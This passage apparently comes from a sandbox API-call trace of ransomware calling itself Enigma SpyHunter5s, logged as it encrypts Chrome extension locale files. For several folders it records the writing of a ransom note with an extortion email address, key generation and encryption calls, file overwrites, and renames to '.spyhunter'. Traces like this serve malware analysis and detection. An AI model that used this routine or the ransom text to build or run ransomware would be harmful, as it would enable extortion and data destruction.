Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json.spyhunter")) returned 1 [0159.142] GetProcessHeap () returned 0x2c0000 [0159.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.142] GetProcessHeap () returned 0x2c0000 [0159.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0159.142] GetProcessHeap () returned 0x2c0000 [0159.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1c780 | out: hHeap=0x2c0000) returned 1 [0159.142] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.143] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.144] WriteFile (in: hFile=0x178, lpBuffer=0x25ceaff*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cec28, lpOverlapped=0x0 | out: lpBuffer=0x25ceaff*, lpNumberOfBytesWritten=0x25cec28*=0x127, lpOverlapped=0x0) returned 1 [0159.145] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.145] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cec28, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cec28*=0x2ac, lpOverlapped=0x0) returned 1 [0159.145] CloseHandle (hObject=0x178) returned 1 [0159.145] GetProcessHeap () returned 0x2c0000 [0159.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1c5f8 | out: hHeap=0x2c0000) returned 1 [0159.145] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cebc8 | out: pbBuffer=0x25cebc8) returned 1 [0159.145] GetProcessHeap () returned 0x2c0000 [0159.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0159.145] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cebc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cebc0*=0x30) returned 1 [0159.145] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.147] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json") returned 155 [0159.147] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.147] GetProcessHeap () returned 0x2c0000 [0159.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0159.147] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ceb84, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ceb84*=0xef, lpOverlapped=0x0) returned 1 [0159.148] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff11, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.148] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xef, lpNumberOfBytesWritten=0x25ceb84, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ceb84*=0xef, lpOverlapped=0x0) returned 1 [0159.149] GetProcessHeap () returned 0x2c0000 [0159.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0159.149] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.149] WriteFile (in: hFile=0x178, lpBuffer=0x25cebc4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ceb84, lpOverlapped=0x0 | out: lpBuffer=0x25cebc4*, lpNumberOfBytesWritten=0x25ceb84*=0x4, lpOverlapped=0x0) returned 1 [0159.149] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ceb84, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25ceb84*=0x30, lpOverlapped=0x0) returned 1 [0159.149] CloseHandle (hObject=0x178) returned 1 [0159.149] GetProcessHeap () returned 0x2c0000 [0159.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.149] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json.spyhunter") returned 165 [0159.150] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json.spyhunter")) returned 1 [0159.151] GetProcessHeap () returned 0x2c0000 [0159.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.151] GetProcessHeap () returned 0x2c0000 [0159.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0159.151] GetProcessHeap () returned 0x2c0000 [0159.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1c470 | out: hHeap=0x2c0000) returned 1 [0159.151] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.153] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.153] WriteFile (in: hFile=0x178, lpBuffer=0x25ceaf7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cec20, lpOverlapped=0x0 | out: lpBuffer=0x25ceaf7*, lpNumberOfBytesWritten=0x25cec20*=0x127, lpOverlapped=0x0) returned 1 [0159.154] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.154] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cec20, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cec20*=0x2ac, lpOverlapped=0x0) returned 1 [0159.154] CloseHandle (hObject=0x178) returned 1 [0159.154] GetProcessHeap () returned 0x2c0000 [0159.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1c2e8 | out: hHeap=0x2c0000) returned 1 [0159.154] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cebc0 | out: pbBuffer=0x25cebc0) returned 1 [0159.154] GetProcessHeap () returned 0x2c0000 [0159.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0159.154] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cebb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cebb8*=0x30) returned 1 [0159.155] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.156] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json") returned 155 [0159.156] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.156] GetProcessHeap () returned 0x2c0000 [0159.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0159.156] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ceb7c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ceb7c*=0xec, lpOverlapped=0x0) returned 1 [0159.157] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff14, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.157] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x25ceb7c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ceb7c*=0xec, lpOverlapped=0x0) returned 1 [0159.157] GetProcessHeap () returned 0x2c0000 [0159.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0159.157] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.158] WriteFile (in: hFile=0x178, lpBuffer=0x25cebbc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ceb7c, lpOverlapped=0x0 | out: lpBuffer=0x25cebbc*, lpNumberOfBytesWritten=0x25ceb7c*=0x4, lpOverlapped=0x0) returned 1 [0159.158] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ceb7c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25ceb7c*=0x30, lpOverlapped=0x0) returned 1 [0159.158] CloseHandle (hObject=0x178) returned 1 [0159.158] GetProcessHeap () returned 0x2c0000 [0159.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.158] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json.spyhunter") returned 165 [0159.158] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\da\\messages.json.spyhunter")) returned 1 [0159.160] GetProcessHeap () returned 0x2c0000 [0159.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.160] GetProcessHeap () returned 0x2c0000 [0159.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0159.160] GetProcessHeap () returned 0x2c0000 [0159.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1c160 | out: hHeap=0x2c0000) returned 1 [0159.160] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.162] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.162] WriteFile (in: hFile=0x178, lpBuffer=0x25ceaef*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cec18, lpOverlapped=0x0 | out: lpBuffer=0x25ceaef*, lpNumberOfBytesWritten=0x25cec18*=0x127, lpOverlapped=0x0) returned 1 [0159.163] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.163] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cec18, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cec18*=0x2ac, lpOverlapped=0x0) returned 1 [0159.163] CloseHandle (hObject=0x178) returned 1 [0159.163] GetProcessHeap () returned 0x2c0000 [0159.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1bfd8 | out: hHeap=0x2c0000) returned 1 [0159.163] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cebb8 | out: pbBuffer=0x25cebb8) returned 1 [0159.163] GetProcessHeap () returned 0x2c0000 [0159.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0159.163] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cebb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cebb0*=0x30) returned 1 [0159.164] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.165] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json") returned 155 [0159.165] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.165] GetProcessHeap () returned 0x2c0000 [0159.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0159.165] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ceb74, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ceb74*=0xf9, lpOverlapped=0x0) returned 1 [0159.166] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff07, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.166] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xf9, lpNumberOfBytesWritten=0x25ceb74, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ceb74*=0xf9, lpOverlapped=0x0) returned 1 [0159.166] GetProcessHeap () returned 0x2c0000 [0159.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0159.167] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.167] WriteFile (in: hFile=0x178, lpBuffer=0x25cebb4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ceb74, lpOverlapped=0x0 | out: lpBuffer=0x25cebb4*, lpNumberOfBytesWritten=0x25ceb74*=0x4, lpOverlapped=0x0) returned 1 [0159.167] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ceb74, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25ceb74*=0x30, lpOverlapped=0x0) returned 1 [0159.167] CloseHandle (hObject=0x178) returned 1 [0159.167] GetProcessHeap () returned 0x2c0000 [0159.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.167] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json.spyhunter") returned 165 [0159.167] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\cs\\messages.json.spyhunter")) returned 1 [0159.169] GetProcessHeap () returned 0x2c0000 [0159.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.169] GetProcessHeap () returned 0x2c0000 [0159.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0159.169] GetProcessHeap () returned 0x2c0000 [0159.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1be50 | out: hHeap=0x2c0000) returned 1 [0159.169] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.171] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.171] WriteFile (in: hFile=0x178, lpBuffer=0x25ceae7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cec10, lpOverlapped=0x0 | out: lpBuffer=0x25ceae7*, lpNumberOfBytesWritten=0x25cec10*=0x127, lpOverlapped=0x0) returned 1 [0159.172] lstrlenA 